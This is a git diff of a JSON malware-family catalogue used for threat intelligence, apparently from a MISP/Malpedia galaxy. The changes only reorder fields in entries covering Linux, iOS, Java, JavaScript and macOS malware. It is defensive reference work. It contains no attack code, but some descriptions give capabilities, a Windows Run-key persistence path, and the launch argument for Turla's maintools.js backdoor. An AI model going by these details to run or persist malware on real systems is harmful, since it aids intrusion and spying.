"uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", - "value": "Wirenet", - "description": "" + "value": "Wirenet" }, { + "description": "", "meta": { - "synonyms": [ - "splm", - "chopstick", - "fysbis" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", @@ -1487,105 +1485,102 @@ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" - ] + ], + "synonyms": [ + "splm", + "chopstick", + "fysbis" + ], + "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" + "value": "X-Agent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", "https://twitter.com/michalmalik/status/846368624147353601" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", - "value": "Xaynnalc", - "description": "" + "value": "Xaynnalc" }, { + "description": "Linux DDoS C&C Malware", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", "https://en.wikipedia.org/wiki/Xor_DDoS", "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", - "value": "XOR DDoS", - "description": "Linux DDoS C&C Malware" + "value": "XOR DDoS" }, { + "description": "", "meta": { - "synonyms": [ - "darlloz" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" - ] + ], + "synonyms": [ + "darlloz" + ], + "type": [] }, "uuid": "9218630d-0425-4b18-802c-447a9322990d", - "value": "Zollard", - "description": "" + "value": "Zollard" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" + "value": "DualToy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", - "value": "GuiInject", - "description": "" + "value": "GuiInject" }, { + "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", - "value": "WireLurker", - "description": "The iOS malware that is installed over USB by osx.wirelurker" + "value": "WireLurker" }, { + "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware", "meta": { - "synonyms": [ - "AlienSpy", - "JSocket", - "Frutas", - "UNRECOM", - "JBifrost", - "Sockrat" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", @@ -1594,190 +1589,195 @@ "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" - ] + ], + "synonyms": [ + "AlienSpy", + "JSocket", + "Frutas", + "UNRECOM", + "JBifrost", + "Sockrat" + ], + "type": [] }, "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", - "value": "AdWind", - "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware" + "value": "AdWind" }, { + "description": "", "meta": { - "synonyms": [ - "Trupto" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", "https://objective-see.com/blog/blog_0x28.html", "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" - ] + ], + "synonyms": [ + "Trupto" + ], + "type": [] }, "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", - "value": "CrossRAT", - "description": "" + "value": "CrossRAT" }, { + "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", "meta": { - "synonyms": [ - "Jacksbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", "https://github.com/java-rat", "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/" - ] + ], + "synonyms": [ + "Jacksbot" + ], + "type": [] }, "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", - "value": "jRAT", - "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io." + "value": "jRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", - "value": "jSpy", - "description": "" + "value": "jSpy" }, { + "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/", "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", - "value": "Qarallax RAT", - "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT)." + "value": "Qarallax RAT" }, { + "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.", "meta": { - "synonyms": [ - "Quaverse RAT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", "https://www.digitrustgroup.com/java-rat-qrat/", "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market" - ] + ], + "synonyms": [ + "Quaverse RAT" + ], + "type": [] }, "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", - "value": "QRat", - "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax." + "value": "QRat" }, { + "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", "https://github.com/shotskeber/Ratty" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "da032a95-b02a-4af2-b563-69f686653af4", - "value": "Ratty", - "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist." + "value": "Ratty" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", - "value": "AIRBREAK", - "description": "" + "value": "AIRBREAK" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", - "value": "Bateleur", - "description": "" + "value": "Bateleur" }, { + "description": "WebAssembly-based crpyto miner.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", "https://twitter.com/JohnLaTwC/status/983011262731714565" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", - "value": "CryptoNight", - "description": "WebAssembly-based crpyto miner." + "value": "CryptoNight" }, { + "description": "", "meta": { - "synonyms": [ - "Roblox Trade Assist" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" - ] + ], + "synonyms": [ + "Roblox Trade Assist" + ], + "type": [] }, "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", - "value": "CukieGrab", - "description": "" + "value": "CukieGrab" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/", "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", - "value": "KopiLuwak", - "description": "" + "value": "KopiLuwak" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", - "value": "magecart", - "description": "" + "value": "magecart" }, { + "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands", "meta": { - "synonyms": [ - "SpicyOmelette" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", @@ -1787,266 +1787,266 @@ "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://blog.morphisec.com/cobalt-gang-2.0" - ] + ], + "synonyms": [ + "SpicyOmelette" + ], + "type": [] }, "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", - "value": "More_eggs", - "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands" + "value": "More_eggs" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", - "value": "Powmet", - "description": "" + "value": "Powmet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", "http://resources.infosecinstitute.com/scanbox-framework/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", - "value": "scanbox", - "description": "" + "value": "scanbox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", - "value": "HTML5 Encoding", - "description": "" + "value": "HTML5 Encoding" }, { + "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", "https://twitter.com/JohnLaTwC/status/915590893155098629" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", - "value": "Maintools.js", - "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'." + "value": "Maintools.js" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef", "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", - "value": "Unidentified 050 (APT32 Profiler)", - "description": "" + "value": "Unidentified 050 (APT32 Profiler)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", - "value": "witchcoven", - "description": "" + "value": "witchcoven" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/", "https://github.com/kai5263499/Bella" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", - "value": "Bella", - "description": "" + "value": "Bella" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + ], "synonyms": [ "Mask", "Appetite" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] + "type": [] }, "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", - "value": "Careto", - "description": "" + "value": "Careto" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", - "value": "CoinThief", - "description": "" + "value": "CoinThief" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", "https://objective-see.com/blog/blog_0x2A.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", - "value": "Coldroot RAT", - "description": "" + "value": "Coldroot RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", - "value": "CpuMeaner", - "description": "" + "value": "CpuMeaner" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", "https://digitasecurity.com/blog/2018/02/05/creativeupdater/", "https://objective-see.com/blog/blog_0x29.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", - "value": "CreativeUpdater", - "description": "" + "value": "CreativeUpdater" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis", - "description": "" + "value": "Crisis" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", - "value": "Crossrider", - "description": "" + "value": "Crossrider" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", "https://www.f-secure.com/weblog/archives/00002466.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", - "value": "Dockster", - "description": "" + "value": "Dockster" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", "https://objective-see.com/blog/blog_0x32.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", - "value": "Dummy", - "description": "" + "value": "Dummy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", "https://github.com/Marten4n6/EvilOSX", "https://twitter.com/JohnLaTwC/status/966139336436498432" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", - "value": "EvilOSX", - "description": "" + "value": "EvilOSX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", - "value": "FlashBack", - "description": "" + "value": "FlashBack" }, { + "description": "", "meta": { - "synonyms": [ - "Quimitchin" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", @@ -2055,94 +2055,92 @@ "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" - ] + ], + "synonyms": [ + "Quimitchin" + ], + "type": [] }, "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", - "value": "FruitFly", - "description": "" + "value": "FruitFly" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", - "value": "HiddenLotus", - "description": "" + "value": "HiddenLotus" }, { + "description": "", "meta": { - "synonyms": [ - "Revir" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" - ] + ], + "synonyms": [ + "Revir" + ], + "type": [] }, "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", - "value": "iMuler", - "description": "" + "value": "iMuler" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", "https://objective-see.com/blog/blog_0x16.html", "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/", "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", - "value": "KeRanger", - "description": "" + "value": "KeRanger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", "https://objective-see.com/blog/blog_0x16.html", "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", "https://github.com/eset/malware-ioc/tree/master/keydnap" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", - "value": "Keydnap", - "description": "" + "value": "Keydnap" }, { + "description": "", "meta": { - "synonyms": [ - "KitM" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", "https://www.f-secure.com/weblog/archives/00002558.html" - ] + ], + "synonyms": [ + "KitM" + ], + "type": [] }, "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", - "value": "Kitmos", - "description": "" + "value": "Kitmos" }, { + "description": "", "meta": { - "synonyms": [ - "SedUploader", - "JHUHUGIT", - "JKEYSKW" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", @@ -2150,211 +2148,213 @@ "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf" - ] + ], + "synonyms": [ + "SedUploader", + "JHUHUGIT", + "JKEYSKW" + ], + "type": [] }, "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", - "value": "Komplex", - "description": "" + "value": "Komplex" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", "https://objective-see.com/blog/blog_0x16.html", "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", - "value": "Laoshu", - "description": "" + "value": "Laoshu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/", "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", - "value": "Leverage", - "description": "" + "value": "Leverage" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", "https://iranthreats.github.io/resources/macdownloader-macos-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", - "value": "MacDownloader", - "description": "" + "value": "MacDownloader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", "https://objective-see.com/blog/blog_0x16.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", - "value": "MacInstaller", - "description": "" + "value": "MacInstaller" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service", "https://objective-see.com/blog/blog_0x1E.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", - "value": "MacRansom", - "description": "" + "value": "MacRansom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", - "value": "MacSpy", - "description": "" + "value": "MacSpy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", "https://objective-see.com/blog/blog_0x16.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", - "value": "MacVX", - "description": "" + "value": "MacVX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", "https://objective-see.com/blog/blog_0x26.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", - "value": "MaMi", - "description": "" + "value": "MaMi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", 